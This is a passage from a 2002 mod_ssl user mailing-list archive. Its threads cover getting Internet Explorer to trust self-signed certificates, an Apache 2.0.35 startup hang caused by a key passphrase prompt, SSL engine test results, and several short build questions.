	for modssl-users@modssl.org; Thu, 25 Apr 2002 14:53:03 -0400
Received: from dcomont (sandstorm-red.bascom.com [206.112.62.241])
	by vulcan.bascom.com (8.11.3/8.11.3/SuSE Linux 8.11.1-0.5) with SMTP id g3PIr2B09160
	for ; Thu, 25 Apr 2002 14:53:02 -0400
From: "Drew J. Como" 
To: 
Subject: RE: Dummy SSL Certs and W32/Internet Explorer
Date: Thu, 25 Apr 2002 14:55:10 -0400
Message-ID: <000601c1ec8a$ba2392a0$13013c0a@dcomo>
MIME-Version: 1.0
X-scanner: scanned by Inflex 1.0.12.2 - (http://pldaniels.com/inflex/)
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
In-Reply-To: <009101c1ec85$9e75a480$34d81840@bio2>
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Drew J. Como" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Frank,

*Smiles*.  That was good!  Anyway, the certs are signed (I didn't
understand the signing process until I read the past post), actually
it was done at the time I generated the certs.

It's gotta be a problem within IE since Netscape works just fine.

I'll keep looking...

(PS - What's a good cleaner to get this green marker off my monitor :-) )

Thanks :-)

Drew

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Frank Reichenbacher
Sent: Thursday, April 25, 2002 2:19 PM
To: modssl-users@modssl.org
Subject: Re: Dummy SSL Certs and W32/Internet Explorer


Bring it up in pico, then write your signature on the monitor with a
Vis-A-Vis.

Actually there is a script included in the mod_ssl tarball, called,
interestingly enough, "sign.sh", that does it for you. Again, I forget the
details (sorry).

But no! I just found it in the archives from only two months ago:

http://www.mail-archive.com/modssl-users@modssl.org/msg13272.html

Frank

P.S. - If this doesn't work try using a permanent ink pen.


----- Original Message -----
From: "Drew J. Como" 
To: 
Sent: Thursday, April 25, 2002 10:41 AM
Subject: Dummy SSL Certs and W32/Internet Explorer


> Frank,
>
> That may be it..  Let me be stupid for a second.  How
> do I 'sign' the cert?
>
> Thanks :-)
>
> Drew
>
>
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Frank Reichenbacher
> Sent: Thursday, April 25, 2002 12:37 PM
> To: modssl-users@modssl.org
> Subject: Re: Dummy SSL Certs and W32/Internet Explorer
>
>
> Drew -
>
> Did you sign the certificate? I forgot to mention that I was unable to get
> my IE 6 to accept the CA without prompting until I signed my certificate.
>
> Frank
>
>
>
> ----- Original Message -----
> From: "Drew J. Como" 
> To: 
> Sent: Thursday, April 25, 2002 9:27 AM
> Subject: RE: Dummy SSL Certs and W32/Internet Explorer
>
>
> > Aryeh,
> >
> > I did everything that you had mentioned, but it is
> > still coming up with the message even after I install
> > them.  (I haven't rebooted my machine yet, so I don't
> > know if that has anything to do with it.)
> >
> > I'll reply back to the list after I reboot and let you
> > know if that did it.
> >
> > Thanks :-)
> >
> >
> >
> > -----Original Message-----
> > From: owner-modssl-users@modssl.org
> > [mailto:owner-modssl-users@modssl.org]On Behalf Of Aryeh Katz
> > Sent: Thursday, April 25, 2002 11:08 AM
> > To: modssl-users@modssl.org
> > Subject: RE: Dummy SSL Certs and W32/Internet Explorer
> >
> >
> > > Aryeh,
> > >
> > > It shows up in the 'Intermediate Certification Authorities'
> > > area, but not in any others.
> > >
> > > Is this the problem, and if so, how can I get the cert to
> > > be accepted permanently (atleast until it expires)?
> > >
> > Install Certificate Wizard->Next->
> > Place all Certificates into the following store->Browse->
> > Show Physical Stores->Trusted Root CAs->Registry->
> > OK
> > etc.
> > ---
> > Aryeh Katz
> > VASCO
> > www.vasco.com
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 25 21:16:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA08884; Thu, 25 Apr 2002 21:15:45 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.speakeasy.net id VAA08806; Thu, 25 Apr 2002 21:14:15 +0200 (MET DST)
Received: (qmail 15598 invoked from network); 25 Apr 2002 19:14:10 -0000
Received: from unknown (HELO bio2) ([64.24.216.52]) (envelope-sender )
          by mail14.speakeasy.net (qmail-ldap-1.03) with SMTP
          for ; 25 Apr 2002 19:14:10 -0000
Message-ID: <00b001c1ec8d$ca42bdc0$34d81840@bio2>
From: "Frank Reichenbacher" 
To: 
References: <000601c1ec8a$ba2392a0$13013c0a@dcomo>
Subject: Re: Dummy SSL Certs and W32/Internet Explorer
Date: Thu, 25 Apr 2002 12:17:04 -0700
MIME-Version: 1.0
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Frank Reichenbacher" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Drew,

It's not an IE bug because it works fine for me.

Tell you what, go to http://ssl.mollynet.com/.

Try to install it in your Trusted Root CA store and take careful note of any
information you find in the certificate dialogs when you are prompted to
install the cert. Does it hang up on the CRL?

This is a dummy cert, so be sure to delete it from your Trusted Root CAs
ASAP.

Frank


----- Original Message -----
From: "Drew J. Como" 
To: 
Sent: Thursday, April 25, 2002 11:55 AM
Subject: RE: Dummy SSL Certs and W32/Internet Explorer


> Frank,
>
> *Smiles*.  That was good!  Anyway, the certs are signed (I didn't
> understand the signing process until I read the past post), actually
> it was done at the time I generated the certs.
>
> It's gotta be a problem within IE since Netscape works just fine.
>
> I'll keep looking...
>
> (PS - What's a good cleaner to get this green marker off my monitor :-) )
>
> Thanks :-)
>
> Drew
>
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Frank Reichenbacher
> Sent: Thursday, April 25, 2002 2:19 PM
> To: modssl-users@modssl.org
> Subject: Re: Dummy SSL Certs and W32/Internet Explorer
>
>
> Bring it up in pico, then write your signature on the monitor with a
> Vis-A-Vis.
>
> Actually there is a script included in the mod_ssl tarball, called,
> interestingly enough, "sign.sh", that does it for you. Again, I forget the
> details (sorry).
>
> But no! I just found it in the archives from only two months ago:
>
> http://www.mail-archive.com/modssl-users@modssl.org/msg13272.html
>
> Frank
>
> P.S. - If this doesn't work try using a permanent ink pen.
>
>
> ----- Original Message -----
> From: "Drew J. Como" 
> To: 
> Sent: Thursday, April 25, 2002 10:41 AM
> Subject: Dummy SSL Certs and W32/Internet Explorer
>
>
> > Frank,
> >
> > That may be it..  Let me be stupid for a second.  How
> > do I 'sign' the cert?
> >
> > Thanks :-)
> >
> > Drew
> >
> >
> > -----Original Message-----
> > From: owner-modssl-users@modssl.org
> > [mailto:owner-modssl-users@modssl.org]On Behalf Of Frank Reichenbacher
> > Sent: Thursday, April 25, 2002 12:37 PM
> > To: modssl-users@modssl.org
> > Subject: Re: Dummy SSL Certs and W32/Internet Explorer
> >
> >
> > Drew -
> >
> > Did you sign the certificate? I forgot to mention that I was unable to
get
> > my IE 6 to accept the CA without prompting until I signed my
certificate.
> >
> > Frank
> >
> >
> >
> > ----- Original Message -----
> > From: "Drew J. Como" 
> > To: 
> > Sent: Thursday, April 25, 2002 9:27 AM
> > Subject: RE: Dummy SSL Certs and W32/Internet Explorer
> >
> >
> > > Aryeh,
> > >
> > > I did everything that you had mentioned, but it is
> > > still coming up with the message even after I install
> > > them.  (I haven't rebooted my machine yet, so I don't
> > > know if that has anything to do with it.)
> > >
> > > I'll reply back to the list after I reboot and let you
> > > know if that did it.
> > >
> > > Thanks :-)
> > >
> > >
> > >
> > > -----Original Message-----
> > > From: owner-modssl-users@modssl.org
> > > [mailto:owner-modssl-users@modssl.org]On Behalf Of Aryeh Katz
> > > Sent: Thursday, April 25, 2002 11:08 AM
> > > To: modssl-users@modssl.org
> > > Subject: RE: Dummy SSL Certs and W32/Internet Explorer
> > >
> > >
> > > > Aryeh,
> > > >
> > > > It shows up in the 'Intermediate Certification Authorities'
> > > > area, but not in any others.
> > > >
> > > > Is this the problem, and if so, how can I get the cert to
> > > > be accepted permanently (atleast until it expires)?
> > > >
> > > Install Certificate Wizard->Next->
> > > Place all Certificates into the following store->Browse->
> > > Show Physical Stores->Trusted Root CAs->Registry->
> > > OK
> > > etc.
> > > ---
> > > Aryeh Katz
> > > VASCO
> > > www.vasco.com
> > >
> > > ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > > User Support Mailing List                      modssl-users@modssl.org
> > > Automated List Manager                            majordomo@modssl.org
> > >
> > > ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > > User Support Mailing List                      modssl-users@modssl.org
> > > Automated List Manager                            majordomo@modssl.org
> > >
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 25 21:43:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA10213; Thu, 25 Apr 2002 21:42:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from larry.cc.utexas.edu id VAA10196; Thu, 25 Apr 2002 21:41:58 +0200 (MET DST)
Received: (from mic@localhost)
	by larry.cc.utexas.edu (8.9.3/8.9.3/cc-uts-solaris.m/tmp_mnt/usr/share/src/private/ut/share/etc/sendmail.cf/8.9.3/cf-1.1) id OAA12065
	for modssl-users@modssl.org; Thu, 25 Apr 2002 14:41:56 -0500 (CDT)
Date: Thu, 25 Apr 2002 14:41:56 CDT
From: Mic Kaczmarczik 
To: modssl-users@modssl.org
Organization: UT Austin ITS, Unix Support
Subject: mod_define for Apache 2?
Message-ID: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mic Kaczmarczik 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Please pardon me if this is not the place to ask, but mod_define is
bundled with mod_ssl for Apache 1.3, so I'm starting here.

I'm looking at Apache 2 and noticed that mod_define is not bundled
with the Apache source kit.  Are there any plans to port mod_define to
Apache 2, or is it already there and I'm just looking in the wrong
place?

Our local configurations use the macro definitions in a really simple
way, mostly for virtual host setup. I can reimplement this using M4 or
by brute force, but it has been convenient to have even the simple
substitution capability provided by mod_define.

Thanks,

--mic--

-- Mic Kaczmarczik -- Unix Support -- UT Austin ITS-CAR --
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 26 08:04:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA10877; Fri, 26 Apr 2002 08:03:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id IAA10830; Fri, 26 Apr 2002 08:02:30 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 50B5A4CE75F; Fri, 26 Apr 2002 08:02:29 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g3Q612n05328; Fri, 26 Apr 2002 08:01:02 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from blv-smtpout-01.boeing.com id BAA23206; Fri, 26 Apr 2002 01:59:44 +0200 (MET DST)
Received: from blv-av-02.boeing.com ([192.54.3.92])
	by blv-smtpout-01.boeing.com (8.9.2/8.8.5-M2) with ESMTP id QAA27126
	for ; Thu, 25 Apr 2002 16:57:47 -0700 (PDT)
Received: from blv-hub-01.boeing.com (localhost [127.0.0.1])
	by blv-av-02.boeing.com (8.9.3/8.9.2/MBS-AV-01) with ESMTP id QAA15221
	for ; Thu, 25 Apr 2002 16:59:27 -0700 (PDT)
Received: from cruciate.ca.boeing.com (cruciate.ca.boeing.com [130.42.133.41])
	by blv-hub-01.boeing.com (8.11.3/8.11.3/MBS-LDAP-01) with ESMTP id g3PNxsh18497
	for ; Thu, 25 Apr 2002 16:59:54 -0700 (PDT)
Received: from localhost (dodge@localhost)
	by cruciate.ca.boeing.com (8.9.3+Sun/8.9.3) with ESMTP id QAA29886
	for ; Thu, 25 Apr 2002 16:59:24 -0700 (PDT)
Date: Thu, 25 Apr 2002 16:59:23 -0700 (PDT)
From: "John P. Dodge" 
X-X-Sender: dodge@cruciate
To: modssl-users@modssl.org
Subject: 2.0.35 and mod_ssl hangs
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from QUOTED-PRINTABLE to 8bit by opensource.ee.ethz.ch id CAA23263
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "John P. Dodge" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I just compiled 2.0.35 with:

./configure \
        --prefix=/opt/apache_2.0.35.ssl \
        --with-layout=Apache \
        --without-confadjust \
        --without-execstrip \
        --with-mpm=worker \
        --enable-ssl \
        --with-ssl=/opt/ssl


But when I try to start Apache it just hangs forever waiting for
something:

apachectl startssl


Pertinent last few lines from truss:

truss -eaf apachectl startssl

29883:  door_info(4, 0xFFBEC708)                        = 0
29883:  door_call(4, 0xFFBEC6F0)                        = 0
29883:  stat("/opt/apache_2.0.35.ssl/htdocs", 0xFFBEE6D0) = 0
29883:  brk(0x0014F480)                                 = 0
29883:  brk(0x00151480)                                 = 0
29883:  brk(0x00151480)                                 = 0
29883:  brk(0x00153480)                                 = 0
29883:  brk(0x00153480)                                 = 0
29883:  brk(0x00155480)                                 = 0
29883:  brk(0x00155480)                                 = 0
29883:  brk(0x00157480)                                 = 0
29882:  waitid(P_PID, 29883, 0xFFBEE640, WEXITED|WTRAPPED|WNOWAIT)
(sleeping...)
29883:  lwp_sema_wait(0x000FB2A8)       (sleeping...)
29883:  signotifywait()                 (sleeping...)
29883:  door_return(0x00000000, 0, 0x00000000, 0) (sleeping...)
29883:  lwp_cond_wait(0xFEE755B0, 0xFEE755C0, 0xFEE33C48) (sleeping...)


Anyone know what is going on?


						Thanks....

----------------------------------------
"Mon aéroglisseur est plein d'anguilles"
John P. Dodge
Boeing Shared Services
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 26 10:47:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA19484; Fri, 26 Apr 2002 10:46:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bull1.bourse.ch id KAA19450; Fri, 26 Apr 2002 10:45:23 +0200 (MET DST)
Received: (from nobody@localhost)
	by bull1.bourse.ch (8.8.8+Sun/8.8.8) id KAA03747
	for ; Fri, 26 Apr 2002 10:45:15 +0200 (MET DST)
X-Authentication-Warning: bull1.bourse.ch: nobody set sender to  using -f
Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1)
	id xma003745; Fri, 26 Apr 02 10:45:08 +0200
Received: from regulus.bourse.ch (regulus [172.20.196.148])
	by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id KAA13624
	for ; Fri, 26 Apr 2002 10:45:07 +0200 (MET DST)
Received: from bourse.ch (localhost [127.0.0.1])
	by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id KAA14485
	for ; Fri, 26 Apr 2002 10:45:08 +0200 (MEST)
Message-ID: <3CC91394.8B494E38@bourse.ch>
Date: Fri, 26 Apr 2002 10:45:08 +0200
From: Owen Boyle 
X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: 2.0.35 and mod_ssl hangs
References: 
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Owen Boyle 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

"John P. Dodge" wrote:
> 
> I just compiled 2.0.35 with:
> 
> ./configure \
>         --prefix=/opt/apache_2.0.35.ssl \
>         --with-layout=Apache \
>         --without-confadjust \
>         --without-execstrip \
>         --with-mpm=worker \
>         --enable-ssl \
>         --with-ssl=/opt/ssl
> 
> But when I try to start Apache it just hangs forever waiting for
> something:

Like the passphrase you used when you encrypted your certificate?

You need either a script to feed it or  remove it altogether:

http://www.modssl.org/docs/2.8/ssl_faq.html#ToC31

Rgds,

OWen Boyle.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 26 18:57:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA20617; Fri, 26 Apr 2002 18:56:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from irvexch1.rainbow.com id SAA20595; Fri, 26 Apr 2002 18:55:37 +0200 (MET DST)
Message-ID: <5606C687D4C7D5119A5800508BF30DB401C043D3@mail.rainbow.com>
From: Lynn Gazis 
To: "'Geoff Thorpe'" , modssl-users@modssl.org
Subject: RE: Apache 2.0.35 with SSL - wont start
Date: Fri, 26 Apr 2002 09:58:21 -0700
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lynn Gazis 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I finally had time to get back to this, and, with the advice of a colleague,
got it working.  Here is what I needed to do to get it working:

1) After extracting the Apache 2.0.35 source, I applied a five line patch
from
http://www.apachelabs.org/apache-mbox/200204.mbox/%3cPine.LNX.4.33.020406222
3110.5495-100000@mako.covalent.net%3e.

2) Modified modules/ssl/mod_ssl.h to force SSL_EXPERIMENTAL and SSL_ENGINE
to be defined (since I couldn't get them to turn on with --enable-rule, or
figure out what other option I might need to turn them on, and I needed them
on to test the engine code).

3) Configured with the options --enable-ssl, --with-ssl, and --prefix (with
appropriate directories for the latter two options).

4) Copied the conf/ssl.crt and conf/ssl.key directories from my old Apache
1.3 installation to get the certificate I needed.

5) Modified httpd.conf and ssl.conf to set the server name, specify an IP
address for Listen, and set the ports to 8080 and 8443 since I didn't want
to run the test as root.

With this configuration, I ran a test on Linux 2.4.2-2 and one on HP UX 11.0
32-bit.  The results were:

Linux 2.4.2-2: SSL connections worked.  I was able to run with all session
caches (none, dbm, shmht, and shmcb), and successfully connect with show.  I
have not tested yet with a CryptoSwift card on this OS.

HP UX 11.0 32-bit: SSL connections worked.  I was able to use a CryptoSwift
card, offload to the card (by adding an "SSLCryptoDevice cswift" line to
ssl.conf, and, since HP UX still seems to involve odd ideas about where to
look for libraries, copying libswift.sl from /usr/lib to the directory from
which I was starting Apache), and accelerate my transactions.  Both swamp
and Rainbow's show program successfully connected to the server.  However,
the shmht and shmcb session caches did not work; if I set either of these,
the Web server doesn't start.  No error message is logged when the server
fails to start, and I do get the "httpd started" message, just no process
running. I am able to run with either no session cache or the dbm session
cache.

The tests were done with OpenSSL engine 0.9.6b on Linux and 0.9.6c on HP UX;
based on earlier tests, I expect pre-release 0.9.7 would solve the problem
of needing to copy or link the libswift.sl library on HP UX, since it has
added a configuration option to specify where the engine library is.

So, it appears that there is an HP specific shared memory session cache
issue, but no problem with swamp or other load testing programs, once the
five line patch to ssl_engine_io.c is applied.

Lynn Gazis
Rainbow Technologies

-----Original Message-----
From: Geoff Thorpe [mailto:geoff@geoffthorpe.net]
Sent: Wednesday, April 17, 2002 6:42 AM
To: modssl-users@modssl.org
Cc: Lynn Gazis
Subject: Re: Apache 2.0.35 with SSL - wont start


Hi,

On Wednesday 17 April 2002 04:16, Lynn Gazis wrote:
> s_client doesn't handshake OK with it, Rainbow's show test program doesn't
> handshake OK with it, and swamp doesn't handshake OK with it.  I've been
> wondering what load testing program *does* handshake properly with Apache
> 2.0 (I really need to be able to test it, somehow, under load, and so far
> I've only been able to make single connections from IE and Netscape). 

Ah, well then it would appear to be SSL/TLS weirdness with Apache 2.0.

> Maybe your suggestion is right, and it doesn't like the "GET /\r/\n\r\n"
> request string; I suppose that could explain why several different
programs
> would be able to send traffic to Apache 1.3 and not to Apache 2.0.

If you can't get s_client to handshake with Apache 2, then it is rather 
irrelevant what request string you send through the SSL stream. It requires 
an SSL/TLS stream to be open to begin with. Quite weird really ...

It's hard to tell right off the bat what this could be - but it sounds weird

as I'm sure *someone* working on the SSL functionality in apache 2.0 must 
have tried hitting it with *something* built around openssl. How about 
konqueror, lynx, or some other browser whose SSL support comes from openssl?


Otherwise, I think it would require a comment from someone dealing with 
Apache 2.0 - there seemed to be one or two people saying it was ready for 
production and that it was now time for the 1.3->2.0 switch ... surely one
of 
these could clarify the situation? :-)

Cheers,
Geoff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Apr 27 12:57:45 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA21895; Sat, 27 Apr 2002 12:56:32 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id MAA21839; Sat, 27 Apr 2002 12:55:26 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id D31644CE739; Sat, 27 Apr 2002 12:55:24 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g3RAZgJ33546; Sat, 27 Apr 2002 12:35:42 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from virtual id QAA11114; Fri, 26 Apr 2002 16:30:25 +0200 (MET DST)
Received: (qmail 12802 invoked from network); 26 Apr 2002 18:01:15 -0000
Received: from unknown (HELO manjeet) (61.11.16.165)
  by 202.54.10.78 with SMTP; 26 Apr 2002 18:01:15 -0000
Message-ID: <000801c1ed2f$d7d8ccc0$0201a8c0@manjeet>
From: "manjeet" 
To: 
Subject: mod_ssl problem
Date: Fri, 26 Apr 2002 20:06:54 +0530
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0005_01C1ED5D.E958D8E0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "manjeet" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0005_01C1ED5D.E958D8E0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Dear Sir,

PLease tell me solution about mod_ssl

Starting service httpd[Fri Apr 26 22:16:27 2002] [info] mod_ssl:Compat: =
MAPPED 'SSLEnable' =3D> 'SSLEngine on'

[Fri Apr 26 22:44:59 2002] [notice] Apache/1.3.12 (Unix)  (SuSE/Linux) =
mod_fastcgi/2.2.2 DAV/0.9.14 mod_perl/1.21 PHP/4.0b4pl1 mod_ssl/2.6.2 =
OpenSSL/0.9.5 configured -- resuming normal operations


Regard's
Manjeet

------=_NextPart_000_0005_01C1ED5D.E958D8E0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Dear Sir,


 


PLease tell me solution about =
mod_ssl


 


Starting service httpd[Fri Apr 26 =
22:16:27 2002]=20
[info] mod_ssl:Compat: MAPPED 'SSLEnable' =3D> 'SSLEngine =
on'


 


[Fri Apr 26 22:44:59 2002] [notice] =
Apache/1.3.12=20
(Unix)  (SuSE/Linux) mod_fastcgi/2.2.2 DAV/0.9.14 mod_perl/1.21=20
PHP/4.0b4pl1 mod_ssl/2.6.2 OpenSSL/0.9.5 configured -- resuming normal=20
operations


 


 


Regard's


Manjeet


------=_NextPart_000_0005_01C1ED5D.E958D8E0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Apr 27 12:57:50 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA21898; Sat, 27 Apr 2002 12:56:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id MAA21844; Sat, 27 Apr 2002 12:55:27 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 3634B4CE75D; Sat, 27 Apr 2002 12:55:25 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g3RAast33576; Sat, 27 Apr 2002 12:36:54 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mel-rto3.wanadoo.fr id IAA05754; Sat, 27 Apr 2002 08:40:00 +0200 (MET DST)
Received: from mel-rta5.wanadoo.fr (193.252.19.122) by mel-rto3.wanadoo.fr; 27 Apr 2002 08:39:44 +0200
Received: from x5u8v0 (193.249.185.204) by mel-rta5.wanadoo.fr; 27 Apr 2002 08:39:32 +0200
Message-ID: <000801c1edb4$f218eae0$99faf8c1@wanadoo.fr>
From: "gerard.moisset" 
To: 
Subject: build for modssl and php 3 & 4 (dynamic an static) on solaris (2.6 and8)
Date: Sat, 27 Apr 2002 08:29:53 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0005_01C1EDC5.B4A5F5C0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2615.200
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "gerard.moisset" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0005_01C1EDC5.B4A5F5C0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

from gerar.moisset@francetelecom.com

we have apache 1.3.12 and 1.3.19 on DSO mode (with SYSVSEM) and we are =
tryng to add PHP 3 and 4 as dynamic modules.

- we are looking for build (apxs) on solaris 2.6 and 8.

- what are the higher PHP versions 3.x and 4.x we need to download ?


if you have already checked it pls contact us.

------=_NextPart_000_0005_01C1EDC5.B4A5F5C0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









from gerar.moisset@francetelec=
om.com


 


we have apache 1.3.12 and 1.3.19 on DSO =
mode (with=20
SYSVSEM) and we are tryng to add PHP 3 and 4 as dynamic =
modules.


 


- we are looking for build (apxs) on =
solaris 2.6=20
and 8.


 


- what are the higher PHP versions 3.x =
and 4.x we=20
need to download ?


 


 


if you have already checked it pls =
contact=20
